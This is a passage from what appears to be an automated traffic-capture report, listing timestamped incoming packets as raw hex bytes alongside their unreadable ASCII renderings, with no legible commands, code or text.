dd ce 82 45 6c 52 33 4d d9 Data Ascii: }z#~m7P+`z@dC+~Hf;yds],\1eY>&-~73/K=@c!Ad?.t<X]h_uA HVK);H&D9SEyp\tZ]c\:_/#%x=-E:_m@,@Tb}1NUEUNXciHL'}ElR3M
2021-12-15 13:13:48 UTC	56	IN	Data Raw: e5 cc 4c 71 d6 6e 7e 71 1e b6 8f ed 5e ff c5 e5 ba fb e8 fe bc 23 d3 a0 89 1f 51 65 48 78 05 f1 c9 10 3e 34 32 a0 22 75 fc 83 51 2d e8 8b 40 07 fe 3e 65 8d df 15 f7 75 24 e8 de 7e 57 f9 68 a8 d6 3e 68 8f 6c 1d 1f cd a2 30 67 5f 34 30 93 cd d0 66 20 e1 28 e4 d0 92 21 45 80 60 31 90 6f 66 26 bd a3 4e ec b6 40 74 36 c0 a6 34 ef 0f 64 bb 07 d1 46 c6 70 13 44 26 5d 04 5a 22 bc 93 1d ed 77 2b 74 27 9f 57 63 6c 5c 77 e6 cd fa 71 66 dd 6e f5 7e a1 c4 76 68 f4 85 5f 0e c9 18 9a 0f 4b 2f 58 33 8a 75 92 f3 08 09 5b 6d e8 1f 38 cc b2 7f 84 a6 d7 a6 80 67 c5 63 de f1 19 95 32 d8 7f 18 96 9d 23 9d 32 a3 c9 8d e7 f4 d6 ea 94 d4 81 5d 05 fb 80 71 3d c4 2a 56 f7 d8 44 d8 b6 05 aa 43 ed e7 ed ff 05 d2 05 d7 f4 08 f8 c9 a2 37 99 16 02 30 d7 11 a8 4f 5e f2 cd d7 3f 05 1f 67 Data Ascii: Lqn~q^#QeHx>42"uQ-@>eu$~Wh>hl0g_40f (!E`1of&N@t64dFpD&]Z"w+t'Wcl\wqfn~vh_K/X3u[m8gc2#2]q=*VDC70O^?g
2021-12-15 13:13:48 UTC	58	IN	Data Raw: 18 52 c2 17 04 1c 63 12 5d fc a6 f2 ef 83 3c 42 2e e3 f6 db 05 c5 7d 68 5a 7a 1e e7 e8 f9 b0 b1 4b cf 97 a4 c0 0f 10 24 43 39 6d 0c 1b f5 86 2a 67 ce d9 aa 24 1d 14 7c c6 e2 c6 a4 c7 e2 ef 62 48 b8 6a 03 06 12 5b b8 d2 4c 85 67 29 b4 49 bc e7 06 7b a6 a3 2c da 10 1b 8c a3 c0 31 0e a2 69 0f 86 0d ce 17 35 57 c5 46 8d b4 4e da 24 a6 48 7d ca 41 57 8d 24 74 0e 5f 9d 4e 33 f4 43 c7 c4 a8 7a 0e d1 ac d8 fd 12 5f f6 88 1a 6d 71 4f 9f 6c e6 c0 4f 6e 1f 9f 32 f4 c0 72 97 0a ad e1 21 5e e8 02 c5 66 66 5a 1e 23 86 d1 63 5c e5 8d 22 a4 02 eb e8 bb 7d 44 ad f7 f4 b9 36 55 d0 f2 d2 ef 01 d8 f6 f1 3d 63 a7 68 98 d3 2d 84 00 1d c0 9a a8 1b f4 63 30 40 93 e4 d5 1a e9 99 2b 5e ff 93 36 84 38 8d 5f a9 6d 4d 94 85 65 c3 e5 6d 25 e8 de 5b 8b c9 da 7b 52 85 74 9d e9 4b 8b 34 Data Ascii: Rc]<B.}hZzK$C9m*g$\|bHj[Lg)I{,1i5WFN$H}AW$t_N3Cz_mqOlOn2r!^ffZ#c\"}D6U=ch-c0@+^68_mMem%[{RtK4
2021-12-15 13:13:48 UTC	59	IN	Data Raw: cd f2 f6 63 b3 3b ef 2c d8 67 e1 9a 37 da 96 0f 55 99 e9 33 72 2e 50 36 64 22 25 28 83 e3 f1 29 9d 71 b4 43 fc 2f 4d bd 91 92 eb 1d a6 87 4a b6 4d af e3 f1 7e c0 bb 86 24 f9 94 b8 1e fa 5b 7b 85 94 b1 fe 07 91 cf e1 e4 d7 da ab 2f 1a e2 9d 97 88 43 ab 3c 4b 11 b0 53 7d 4f 1d 57 3e e0 09 9f b8 8e a0 55 4d 16 79 85 66 7a 4c ae fe 46 4d 2e 26 e0 76 54 98 27 06 52 3e e4 ad 07 5c 33 81 5d 03 72 fa 78 09 f6 24 09 58 5d bf 56 37 90 29 e0 31 37 20 e0 75 41 fb 5e 74 6f d0 af d3 4d 6b 6d c4 89 c1 49 97 f5 41 38 ab 06 fa 1e 86 05 2d c7 89 6f 99 a0 cf 92 e2 90 eb 6e 0d 5f 65 0d 20 a7 c9 97 2e e8 9d 5e e6 0e c8 36 56 f5 26 28 e5 be b4 17 3e e9 9d 7a 48 f0 90 e7 a6 a3 57 92 88 ea ce a4 56 3e 72 24 17 40 f7 e6 39 43 4a 28 27 3c ef 26 1b 70 c3 34 3a cd 5d d5 24 d4 85 71 Data Ascii: c;,g7U3r.P6d"%()qC/MJM~$[{/C<KS}OW>UMyfzLFM.&vT'R>\3]rx$X]V7)17 uA^toMkmIA8-on_e .^6V&(>zHWV>r$@9CJ('<&p4:]$q
2021-12-15 13:13:48 UTC	60	IN	Data Raw: 63 3c 4c 04 6b cd bb bd 10 ea ad 3d 7b 95 92 dc 91 2b 3b f5 9d eb e5 d4 85 61 72 1e 03 30 0c 40 1f 02 aa 12 25 e5 65 51 95 cc b9 aa 36 c9 93 0c 05 f7 5f dd 8a 99 07 1f c4 68 58 cb 81 5b b9 09 72 73 ba 2c da 81 05 8e f3 3a 3c e8 23 15 c1 97 55 f7 da b6 67 d4 cc dd f9 22 18 99 4e 14 4e a3 9f 38 82 56 9b ff b9 7f 9f 5a 2a ad 66 29 b2 39 17 e7 b6 c3 60 2f 90 24 fd f5 5f 32 53 65 45 a5 39 15 97 26 24 d0 91 21 a1 63 6c 40 3f 61 db a7 d8 e3 a4 c2 94 ae 0c ed 9d 12 75 3c a3 46 4c 2d 25 2e 76 02 f4 8b b6 ce 65 17 1e 89 c2 a3 1d 48 09 ba 6d ae 01 5a a3 90 17 63 16 10 e0 aa 00 6a 5a 2b 78 f0 05 11 d8 18 a2 3b 25 61 a7 48 50 a2 53 62 cd 5c af ec 70 76 2e 17 e6 a6 c7 a2 77 83 46 dd 6c 2c af 09 7a 20 34 b2 65 ab bd 9d 65 6a b2 6e c9 16 4a 17 0b 9f 7f 0c be b2 0a f1 66 Data Ascii: c<Lk={+;ar0@%eQ6_hX[rs,:<#Ug"NN8VZ*f)9`/$_2SeE9&$!cl@?au<FL-%.veHmZcjZ+x;%aHPSb\pv.wFl,z 4eejnJf
2021-12-15 13:13:48 UTC	61	IN	Data Raw: 73 61 6d 9c 25 45 09 85 5f 9d b6 e1 07 1e db 3f 4d 4e 1c 09 8d 8d 9a b3 a6 f3 8c ea 98 c6 eb 9d 50 90 22 46 87 2c af 5c e9 65 b4 16 08 38 a1 3a 0d ab 04 b6 7a 1e 79 58 66 82 10 77 5f 09 45 9c e5 56 50 e1 80 f3 28 e7 26 e4 29 b0 89 cb 54 4a 46 5f b6 bc 0b e6 3e 37 36 29 82 96 11 ff 25 33 88 20 e8 41 ce 82 63 29 37 a4 5d a6 0c 6e 82 5d 98 74 47 e1 31 b9 06 29 4d e3 d3 f7 22 3d 67 e8 bf 38 c0 25 83 49 81 98 49 cb 69 df 1f 05 29 c8 5c e1 f7 68 58 d4 25 3c 69 28 8e 1f 4a 40 75 84 8f 1a bb d0 7f 57 f4 29 76 ef 9a 22 c6 34 89 dd aa 9b c9 f3 8a 37 e2 4d 67 a1 1a b5 8f 58 c2 eb e8 30 10 d3 e6 08 0b 50 d2 c4 ce bb d3 41 a8 62 b0 10 d5 2d e8 53 6f 06 23 6d a0 21 ff 04 25 61 11 5d 01 d5 b3 b2 45 21 82 fb 26 28 ec ef e3 16 ba 01 2a a1 92 5a 92 4e e1 98 8f 65 1e 8c 94 Data Ascii: sam%E_?MNP"F,\e8:zyXfw_EVP(&)TJF_>76)%3 Ac)7]n]tG1)M"=g8%IIi)\hX%<i(J@uW)v"47MgX0PAb-So#m!%a]E!&(*ZNe
2021-12-15 13:13:48 UTC	63	IN	Data Raw: ae b1 1a 06 94 02 40 b0 76 9e 81 d7 fb 9b bc 09 b1 bb 27 7e 72 6c 6f 6d b5 14 30 96 65 ab 1a 25 23 ac 29 a4 b2 1d d2 b6 aa 07 3b 4c 51 2f e2 95 98 94 f3 83 a9 42 f3 be fb 2f ca f1 0e c2 db b5 7a 0b 28 14 da 2a cf 65 c2 21 de 7a 79 55 9c c7 44 0c 2b 34 7b 0c 04 ed d6 27 fb de 32 15 18 7b 01 07 49 2d 76 bf a4 8e f5 97 75 a0 21 99 2a f5 10 a2 e2 2e 29 b8 8e 5b 81 b9 8e da 89 06 cb 34 df f7 9a 0a 7a 96 7b bc c0 7f 02 b8 64 00 9b 74 92 d5 37 63 db d7 4c 5e aa fc df 1e e9 e0 d9 73 e1 6b 20 c2 f7 24 f7 c1 d4 74 15 e0 c6 8f 3b 76 cb d8 4f fc e0 4e 97 d7 b2 7b 20 c5 93 97 82 78 31 3a 53 f8 cb fa bb d0 cc 69 e7 e2 2e e4 a9 54 63 10 c2 65 81 37 92 61 be 86 97 ef a0 c9 cc 11 7b 68 6f ff 79 c1 45 0d 56 3a ce ab 32 42 26 33 b1 fd 72 a9 d8 84 fd dd b5 bc a0 83 30 df 02 Data Ascii: @v'~rlom0e%#);LQ/B/z(e!zyUD+4{'2{I-vu!.)[4z{dt7cL^sk $t;vON{ x1:Si.Tce7a{hoyEV:2B&3r0
2021-12-15 13:13:48 UTC	64	IN	Data Raw: fb e5 1e 77 c9 da 93 48 f9 31 65 6e 8f 87 b1 45 0b ef 92 4b 3e d4 71 65 db 58 35 15 62 95 21 b6 73 f1 d6 5a 87 bf 34 ff 1e 28 87 a3 ee 26 ea d9 75 a0 89 17 28 06 85 51 04 72 0d 8f e7 13 a3 8f 56 62 78 cf dd 4a 6b b2 cb f5 d8 cb 20 71 0f 85 a3 fb 1e 6c f1 f5 ac 45 ec 25 81 c2 e5 5a b7 e4 ac 30 5d 76 69 98 b2 18 10 88 2c 00 a9 e9 a5 04 31 57 d9 b8 28 cf 31 6e 07 66 26 bd 70 ea 6c f3 b8 4c ba 1c 1b 11 af 5e 32 02 0e 1d 07 39 1a 98 ad 79 db 91 a2 5c 87 7c ca 7b eb cd c1 5b 58 da 93 84 2c 06 71 d5 12 75 ee 8d 86 1a 9c a1 c4 f5 c6 fc 8b b5 16 65 6c c8 e2 94 b3 90 4d 1f c2 6d a1 d5 73 71 13 d3 e4 ed e4 95 ba 09 e3 ea 7b f3 df 36 11 10 a5 0c 49 8f e7 f5 4e c6 74 97 5e c8 5c 50 8f 3d a9 ad d3 73 d4 3a d6 dd 6c 7e 33 2f 7e 7a db f1 6d a9 aa 0d 15 40 e1 f3 e3 8b f1 Data Ascii: wH1enEK>qeX5b!sZ4(&u(QrVbxJk qlE%Z0]vi,1W(1nf&plL^29y\\|{[X,quelMmsq{6INt^\P=s:l~3/~zm@
2021-12-15 13:13:48 UTC	65	IN	Data Raw: 95 ea 98 05 14 08 34 52 6a 89 c5 a1 59 a7 f4 97 84 50 4d 03 c9 7b 3e c8 e9 ec 6c 46 3a 8b 06 34 09 04 80 e7 c7 68 be d4 86 b4 68 14 62 58 c1 4a d1 0c a0 fc 36 bb 00 0b 54 59 52 d1 60 d6 16 5b 46 29 d9 fc f8 7e bb 4d 6f 9a d5 ce 1a cb d0 15 31 e9 fc d0 36 91 22 48 e7 4a eb d7 40 59 35 89 45 9e e8 d7 9e 9e 90 40 d9 f9 4b 86 e8 67 a3 2c 07 12 ff 81 cf c8 5b 8c 34 fc c9 54 55 98 8b d5 14 b4 d1 2e a2 c3 c6 55 a2 b2 07 cf ff 83 96 6f 8b 8d 18 55 34 e1 dc 79 3e 49 ed 09 9a 54 be cc ad 78 5f a0 3e 1f 32 2c 8c 19 37 f7 b8 da 91 d4 42 fc 7d a2 24 15 39 72 e1 ac 08 c4 00 f9 8e 5c be d9 66 e1 95 6f 36 e5 1a 31 b4 8e 5d e8 bb c3 5f 01 42 f4 3a 71 8d 47 d9 ad c2 11 ce bc 32 2f 35 cc ab 25 8d a6 d8 01 de 00 87 62 b9 2e f8 87 5d 51 e5 ad d4 bf 7e 7e 6f 39 10 da 88 ed c2 Data Ascii: 4RjYPM{>lF:4hhbXJ6TYR`[F)~Mo16"HJ@Y5E@Kg,[4TU.UoU4y>ITx_>2,7B}$9r\fo61]_B:qG2/5%b.]Q~~o9
2021-12-15 13:13:48 UTC	66	IN	Data Raw: 39 9b 3f 73 32 aa ae 6e 76 50 9a f2 20 a7 c5 27 93 62 4e 6d c9 50 1e 97 bf d0 f1 a8 da 35 ce 9f 50 2c 91 ff e9 b7 47 82 ee e1 aa 6d f4 7e 22 5e 58 4a 23 24 ce 18 0a 48 4b 3d b9 5e 8d 1b 37 74 cd 31 38 46 05 72 df b2 9a 33 b0 13 cb 5d 23 48 03 e5 53 56 b5 62 04 2f d8 fb 33 6f dc e9 00 50 93 ca 8b ea 03 87 24 2d e8 1d 32 32 44 71 f0 d9 be 61 6e 2e fb 6f 0c 8a 53 14 e9 43 cb 97 be 1a c1 6c 0c 0c c0 12 72 98 31 e5 cf b5 39 53 b9 ab b3 6b e9 19 b3 e1 71 be 4f b5 20 c9 84 d9 d1 30 c1 c8 99 2f 84 28 06 e4 ee cc f4 67 3c 0e 1b 4c 8c 33 95 98 65 8f 69 cf f3 a1 67 00 ab 99 6a 51 e3 0d c3 97 ea 6a 7a aa 67 e8 32 b5 c8 8b f1 23 08 ea 2b ec c7 73 b6 05 97 ec 5c e1 24 21 ed 06 5f 9f 6b 85 fc ca c5 54 09 ba df f2 01 bb 77 08 27 ff 25 f4 38 1e fd e3 f9 e1 af 66 b5 c8 f9 Data Ascii: 9?s2nvP 'bNmP5P,Gm~"^XJ#$HK=^7t18Fr3]#HSVb/3oP$-22Dqan.oSClr19SkqO 0/(g<L3eigjQjzg2#+s\$!_kTw'%8f
2021-12-15 13:13:48 UTC	67	IN	Data Raw: f6 08 09 d3 6e e8 1f 38 72 08 d6 7d 59 a5 a0 35 66 6b 17 10 3d d0 51 aa f5 58 e7 1d df 2d 10 b7 cf 52 fb 8c e1 7f ff bd d7 14 a2 05 e9 40 26 c2 3b 12 df 7b 20 b9 75 8e 11 ba 62 37 e7 ed 9a 64 54 af d7 79 e5 8c 36 5d c8 a2 fa e3 e5 d7 41 2a a2 9e f1 9e 02 13 44 27 de f9 d5 7c c8 fa f8 f0 ce 55 f2 34 d9 52 0b 2f 89 ae f7 45 ad 43 10 56 f2 21 72 18 90 91 59 16 ef e3 22 30 2c 2e ae e8 81 04 9c 62 93 96 7d 4a 82 1d f2 7e c0 eb e0 a6 8b 52 47 95 a1 6c a1 e8 c1 e6 01 f8 fa a0 25 6f 9a a5 91 1c 89 9c 48 d9 e6 09 ab 95 90 0e b8 ed 7d b2 b7 57 b5 f3 77 fa 18 d4 5d aa 31 80 39 8d d0 56 5b b4 5c 06 2a 57 74 d4 12 44 50 3e 0d 8b e4 b6 15 2b 82 54 64 04 c0 ff 44 48 a7 5f 8c 69 db f0 84 cc be d5 e9 69 9c 3a 67 a5 b3 43 e3 84 7e ee 1a ab 02 da 12 d5 ed ff 0d c6 09 2a fb Data Ascii: n8r}Y5fk=QX-R@&;{ ub7dTy6]AD'\|U4R/ECV!rY"0,.b}J~RGl%oH}Ww]19V[\WtDP>+TdDH_ii:gC~*
2021-12-15 13:13:48 UTC	69	IN	Data Raw: 5e bf ef e7 28 9d a3 1a a2 0b fa 00 eb 63 ce 9d 3c 9f 57 ff 3a f2 21 e1 5c 59 7b 3d 30 8a 46 6d ee 5a b0 c7 65 c6 22 5d de 8b 09 41 76 2a 9e 66 10 0c 27 7a 4b 0b 14 7e 84 44 9b 02 60 26 45 2a a1 6d d5 b9 cb 99 93 0c a1 34 d6 71 5c af 64 b0 7b 38 42 63 32 64 0e 83 dc a9 47 6b 46 c8 fa c0 79 55 d3 0f d4 54 9b e1 5d be 2e e9 e7 d9 fa e7 5e 8b e1 eb 0f 87 d1 fe 7f f7 59 25 71 64 51 95 9b 01 ec d3 3a 6c 7e 13 5f a8 af f8 5b fb b2 d3 b9 06 5e 79 28 cb 9a df 73 96 28 d8 61 d7 26 81 10 73 8b f3 c0 b3 0c fa e1 7e 60 98 a1 30 ca 88 c6 02 12 88 c8 ed 6d f1 78 d1 08 92 4c 6c 83 60 26 06 ee 30 ce d6 d8 e9 18 35 84 06 bc dd d7 f4 62 f6 ce ac 19 6b e8 c6 4f 1b ab e5 a5 5a 29 8a bf 3e b0 ee 67 84 f9 eb a0 81 6d 71 fc 4b be da a3 75 a3 7d d1 82 2c 50 57 23 89 18 89 24 12 Data Ascii: ^(c<W:!\Y{=0FmZe"]Avf'zK~D`&Em4q\d{8Bc2dGkFyUT].^Y%qdQ:l~_[^y(s(a&s~`0mxLl`&05bkOZ)>gmqKu},PW#$
2021-12-15 13:13:48 UTC	70	IN	Data Raw: 5c 41 82 05 01 bc be 8b f9 a0 92 5f 7c 10 2c 3c 07 48 3e c8 3e 9a e2 9a f2 fd e8 24 41 a0 50 be 6a 63 d4 76 e0 52 c4 f5 28 e5 63 96 28 7d 45 6f fc be 84 e1 e7 ae bd 51 92 88 eb 40 52 1d d2 89 56 a4 a8 ef 16 b4 d6 31 a0 d0 a9 bc 1a fb 80 9d d8 c1 b1 66 97 92 c6 a6 db 38 65 72 4d a0 0d a4 f8 4a c3 ec 18 52 70 48 82 3e 09 24 d0 ad cf 08 c0 83 38 14 a0 62 d0 2f ed 72 27 87 2c 77 4b e1 bf 11 ad fa 52 bb eb 9f 63 c8 d4 2a 93 7f 70 85 44 b2 d0 7a 8f f6 b9 9d 5d dd 6d fc 47 c3 6c 95 5e 73 60 df 23 6c 9e 55 35 5f 64 7e d0 29 d7 6a 78 d2 43 3d 5b ed 0c 27 2e 69 a9 15 9a 8a 3a 33 a4 f0 a1 0c 43 89 5d 98 72 55 dc d6 42 f9 5d 40 53 dc a5 ca 5c 38 17 bf b3 ed 64 59 34 a9 c0 b6 34 b8 48 59 ee 4a 0e d1 64 98 57 87 a0 f7 30 7c 0a d3 4f 1c 25 7a 00 63 e1 c7 eb f4 cc ae 23 Data Ascii: \A_\|,<H>>$APjcvR(c(}EoQ@RV1f8erMJRpH>$8b/r',wKRc*pDz]mGl^s`#lU5_d~)jxC=['.i:3C]rUB]@S\8dY44HYJdW0\|O%zc#
2021-12-15 13:13:48 UTC	71	IN	Data Raw: c8 e2 0f 1e 17 ec 9e 5c e2 34 27 db 85 19 1e 8c a3 1b 81 e4 62 24 e0 cf 84 f1 08 c3 71 3a 3a 9c d0 70 c1 94 32 9b 39 18 96 a4 bb 81 bf ef af 06 f8 37 2a 1d 6b 2b ba d0 dd e0 7e 8b d5 bc e4 db 7a ab 37 23 43 54 42 ef 23 a6 6e b6 9e ac 47 a1 6f 60 fc 43 24 33 c0 fe e2 b5 3f 4b 5c 4f 34 7a d3 7d 86 73 0c ce 7f e5 38 f5 fb a9 f0 bb 2e 0d cb d9 52 17 f5 17 62 f2 2f ed a8 6c 56 42 80 e2 c1 82 10 59 ba 66 32 56 f6 7e cc 51 10 2e a9 f7 83 25 1d 85 06 41 e1 f9 7e c0 bb e3 b0 95 69 47 6a e6 c1 a3 03 a4 1a 88 7e 71 6e 2d e4 3f 36 1e d8 8f 10 0e 6b 47 a8 ec c2 1b 7b b0 e0 1e 6b 40 94 ea fe 12 d2 76 f5 b8 f7 71 be 21 35 6e 25 3f 7d 6d 70 79 6f 74 7e 64 27 30 53 15 d1 a7 d3 cd 91 88 cd 68 33 00 a8 1f 88 f0 09 db 0c 6f 5d bf 7a 3a 9a ef a5 0b f8 dd 3b fc 8f 75 c7 b2 7c Data Ascii: \4'b$q::p297*k+~z7#CTB#nGo`C$3?K\O4z}s8.Rb/lVBYf2V~Q.%A~iGj~qn-?6kG{k@vq!5n%?}mpyot~d'0Sh3o]z:;u\|
2021-12-15 13:13:48 UTC	72	IN	Data Raw: 29 0c d5 0a c8 65 0e 0a 04 50 2a a6 39 88 43 67 6a d0 e0 22 c9 4a 68 d8 90 ea e8 bb 16 c9 29 f7 fb be 74 48 5b bf ad c0 63 30 ef c2 41 62 24 ac 1b d0 b6 32 d0 5b 4c 79 1e 82 7a f4 0f 3b 17 e4 ad 6d f2 81 81 56 d7 04 5f 48 1b 2c ab 5a c2 53 19 c0 ec 82 d4 a2 f3 42 10 1e 77 c8 da 7b 52 1d 6f ee 08 16 48 6f 42 83 6b 4c 4b 3e d5 fa 28 cb 50 03 9a 86 c8 e2 51 f5 f7 9b d7 d9 87 0d a8 7b 93 5c 0c 40 1f 02 76 59 8c 77 65 51 3b 9f b9 7a 6b c9 93 d2 1d 0e a8 db 8a 0c 55 1a c4 b8 7e 34 7e 5b b1 6d 74 73 ba f2 cd 75 f7 42 7e 64 bb 46 86 59 73 90 8f 6c 1d ed c9 a2 30 67 67 62 9b 5d f5 55 a6 2f 64 86 82 59 1f 89 33 3a 67 54 19 45 37 ad 78 15 7c 18 3b d5 b2 c9 6f d4 2b b7 a1 e3 d0 22 2f 3c f9 15 96 a2 25 d0 91 29 8a bf e7 09 97 cd 24 77 5b a4 de 65 6c c5 fd 62 76 11 f8 Data Ascii: )eP*9Cgj"Jh)tH[c0Ab$2[Lyz;mV_H,ZSBw{RoHoBkLK>(PQ{\@vYweQ;zkU~4~[mtsuB~dFYsl0ggb]U/dY3:gTE7x\|;o+"/<%)$w[elbv
2021-12-15 13:13:48 UTC	74	IN	Data Raw: b2 17 5d 67 a9 81 de 62 b2 33 be 95 2a 59 d8 f4 12 72 53 9f f0 83 27 3f f6 6b e0 e5 11 ae ad 3d ad 46 b9 9f 5c b7 61 63 06 59 e3 5c 92 87 36 98 df e5 dd d0 90 28 22 70 49 77 bd 0d 91 38 fb 08 e2 6a 57 53 6d 28 e7 db 26 af 98 58 fb fc cd 87 b0 57 d1 b8 d9 a7 1f 86 59 09 83 79 6d f3 7f a6 fd 9a ca 6a 96 db 38 71 29 4d 68 f7 ed 42 49 62 28 08 38 b6 80 e3 64 f4 fb 2f 00 a9 a9 07 84 fa 14 c6 68 59 df 88 d2 fc 00 2e 03 c9 bf be 11 30 d7 ad 44 e5 de 3b 36 eb 85 4e 12 76 ed bb 4d 04 ee 73 4d e2 8b 52 d2 eb 46 54 c7 c0 3d ee 7e 35 03 9e d4 58 dc b9 97 65 7b 7d 3e 9a 44 fd aa 3d 06 b4 be 24 46 36 2c 51 2f 17 6d c3 45 d6 77 0d 1b b5 7b 0b 70 af eb 99 3a d3 06 c8 c2 1a 4d 8f df aa 67 45 e9 b3 68 9c 33 f6 59 62 3d ec b8 48 65 68 51 51 d8 63 74 ac 78 da 5f 14 ea 5a 34 Data Ascii: ]gb3*YrS'?k=F\acY\6("pIw8jWSm(&XWYymj8q)MhBIb(8d/hY.0D;6NvMsMRFT=~5Xe{}>D=$F6,Q/mEw{p:MgEh3Yb=HehQQctx_Z4
2021-12-15 13:13:48 UTC	75	IN	Data Raw: 12 b2 fa 61 0b 4c 50 a1 03 33 c2 ce 08 c1 e2 03 91 df ad 4b e6 db 42 32 40 0b 28 c0 42 64 d5 b7 b0 68 45 e0 62 c1 02 29 2b 0b 9a fd d9 f5 0f 5d cd da 6d 2e 55 3a ae 3a 33 bb e6 1d 62 fa f4 98 d0 ed 23 e1 5d 88 78 2c db 3d 2c 18 57 7a 20 32 a9 4d 5e 42 62 5d e1 60 37 4a ae fe 3f d4 ec fc c8 29 b1 ce f4 e2 e5 bd 11 4f 1a bc a3 ce 69 b9 e0 cc 98 7b 2e b8 ae 13 5c 96 13 e6 79 a2 5e 9c 0f aa 23 da f0 ef ec 2e 3f d7 a7 dd 76 18 2f 52 4c 7a 12 4b 35 b8 f4 c6 51 9b f0 ff 15 a6 87 1e 45 8c 41 ed f9 7e c0 81 0b 24 4e b9 17 b0 43 13 62 00 64 c1 54 28 fa a0 6d b6 3f e3 58 27 70 90 0a fc dc f2 55 45 13 71 b0 bb 18 cb e5 07 3e e5 35 78 2d 14 5d c0 b2 c9 64 22 df 86 98 49 6b c5 04 53 a8 31 34 75 e0 18 f6 d6 18 e2 9e c7 88 f5 98 8b f9 74 26 80 7f 48 df 59 de 99 2a 93 62 Data Ascii: aLP3KB2@(BdhEb)+]m.U::3b#]x,=,Wz 2M^Bb]`7J?)Oi{.\y^#.?v/RLzK5QEA~$NCbdT(m?X'pUEq>5x-]d"IkS14ut&HY*b
2021-12-15 13:13:48 UTC	76	IN	Data Raw: 13 35 ca c7 a7 72 9f 8f 1a 38 9f 32 00 c0 3f ad e2 e3 c5 ac 0b 54 3a af 0c 36 5f 8f 8e b2 f4 63 5c 8f 75 ea d1 41 14 17 44 ff b7 48 7e b3 22 34 cc 1b 40 d1 41 57 d8 4e c1 3d 63 a9 39 d0 72 59 9e 37 dc 52 6f 61 ee 2a 9e 83 d4 57 4c ba de 5b 28 96 46 92 ef 25 03 b6 85 ee 99 63 98 16 44 18 93 8f 65 1c c4 90 6e 32 a3 da 11 52 11 67 8d 6b 6f 8b 34 ed b0 a7 94 5a 54 d4 90 28 98 59 d4 56 7f 7d 52 1f f5 9d f7 e2 05 a7 96 95 93 04 cf a0 e9 fc 45 db 3c c0 ad 9a ae e9 08 6d 87 ce c9 1a c6 b4 ef e0 a1 0a f7 07 39 16 6b f4 c3 81 a2 00 e6 f2 80 45 d5 b3 1e 2b ce 7e 10 18 83 d1 c0 3e 1c fc 62 f7 fd 30 29 d3 b6 e7 ae 18 ed db 53 19 00 e1 5c 92 dc df ad b4 20 c1 61 55 b9 66 26 6d ae f3 ba 75 1f 40 04 50 70 f2 02 03 f1 8d c8 fe 99 a5 b7 4e 7b 60 c6 a0 49 8a c8 80 ce 57 5f Data Ascii: 5r82?T:6_c\uADH~"4@AWN=c9rY7Roa*WL[(F%cDen2Rgko4ZT(YV}RE<m9kE+~>b0)S\ aUf&mu@PpN{`IW_
2021-12-15 13:13:48 UTC	77	IN	Data Raw: 4f 6a 53 76 58 d8 f8 ee e0 2b 41 43 13 34 44 09 62 12 83 77 13 d7 46 7b dc 39 28 cb 71 91 c9 c9 9e f4 43 ae 4b 4c 61 39 93 3a 9e 42 bf 15 0e de 1d fc 7b e6 b3 48 59 b1 99 d7 3e bf 1a 40 e8 fb 0e 78 6d 07 bc 84 fd 34 68 7b 99 37 c1 5f ef d5 5c 2e a6 77 ba 26 50 de 36 f1 51 59 35 cb b8 03 80 aa 5e ad cb 30 3d 03 5c 62 3c 50 4e cb 48 e7 13 a0 f4 77 19 50 4d 0d 40 93 ec 3b b4 3c 4a ba 0a 85 6e 1c 82 8a d4 60 8a f8 85 83 e3 51 16 bb cc 33 1e c0 b9 78 5e a9 e6 bf 03 b9 65 a1 56 ce 38 d0 0d db 9f 0f 16 77 d9 8e eb 27 8f 40 67 9f 97 cb 41 02 09 71 28 38 93 e7 98 47 34 03 86 84 6f bd 4e 5a 31 86 09 47 cc c3 78 d2 aa f9 c6 bb 1c 25 f3 c4 88 c0 17 07 5b 85 8b 5e 18 84 ce 2a 5d 1b 3b ed 9a fa b8 80 aa c9 97 d8 a9 a9 b0 c5 d4 3c c0 97 01 25 57 0f 72 e1 bf 46 84 c2 6a Data Ascii: OjSvX+AC4DbwF{9(qCKLa9:B{HY>@xm4h{7_\.w&P6QY5^0=\b<PNHwPM@;<Jn`Q3x^eV8w'@gAq(8G4oNZ1Gx%[^*];<%WrFj
2021-12-15 13:13:48 UTC	79	IN	Data Raw: 5b ce 89 4f 49 e1 da e6 19 e4 68 49 75 0a f5 bf dd 6d 8c a1 65 ec 77 84 fc 02 c8 e2 ee 5d 8e ec 02 d7 19 9b 88 df 49 cb 84 da 4b ca bd 1f 97 a7 24 ad 07 65 6e a8 bf a2 c5 d1 a5 3a d8 6c 26 f4 58 47 c8 7c f4 d0 22 f2 50 51 57 3a cb 4a a8 a8 83 ed ea 20 03 7f db 34 2f 8e f1 cc 38 cb 31 56 42 62 64 b1 ba 18 a5 73 ea 46 9e 60 ac 0e e7 a7 ca 16 a1 98 d7 11 4f 02 a4 9b 95 d0 3f 68 45 98 f6 e8 6d f7 76 fc 88 41 6b 81 28 0c 7e 27 dd b6 25 78 d7 6e 6c 2b 58 58 d2 a5 9e c6 1c dc f9 a9 98 d6 60 7a c6 5e 94 b9 fa 1f a6 ef e2 5d dd e6 8f f3 14 c0 bc 5d 41 05 73 47 e1 c3 7c 11 ba 44 26 01 92 79 33 7b 6d 92 a5 3e dc 69 93 ca 17 59 15 ee e3 71 7b da bb c2 d8 94 12 45 48 c9 0b 2d 7e 35 45 93 43 dd b8 8e 67 d0 06 57 4c cc e2 a8 b6 d2 a4 65 5b 3d 02 23 14 f5 32 f3 d2 64 6a Data Ascii: [OIhIumew]IK$en:l&XG\|"PQW:J 4/81VBbdsF`O?hEmvAk(~'%xnl+XX`z^]]AsG\|D&y3{m>iYq{EH-~5ECgWLe[=#2dj
2021-12-15 13:13:48 UTC	80	IN	Data Raw: e9 bd 07 0a 05 19 26 44 6d 27 a0 60 1f 92 7d 25 1c c2 e3 15 d8 f2 af 05 77 08 29 b6 d5 8f 07 94 ba 5d 53 b8 e6 c3 c9 f3 5a a2 62 8f 3d e4 e4 4a 67 5c 5b 60 0d e6 56 e8 47 c4 34 61 79 ac 06 7c e2 eb dc dc 63 aa 45 50 e4 ff 1b d0 ae 37 d6 ab 0c 0c b7 71 19 57 59 da 69 a3 cc 64 82 f7 3b 58 9a 55 4b 01 2b 93 a3 e4 7f ca 5c 5d 10 d6 2e 03 fd fb bc 96 32 6e 53 3e 9e cb 74 b5 64 0e 5f bd c0 dc e2 03 97 b7 91 1c a1 8e e5 d4 54 8d 1c 64 c9 93 14 da ac 0e aa e4 76 d6 d0 46 b6 7d 13 8b be 12 2b cf 92 c8 e3 81 b5 62 78 84 2b 0c de 8f a3 e4 22 a2 8e 00 d4 63 00 cf 8b d6 34 ec c8 70 c8 e6 9f cc 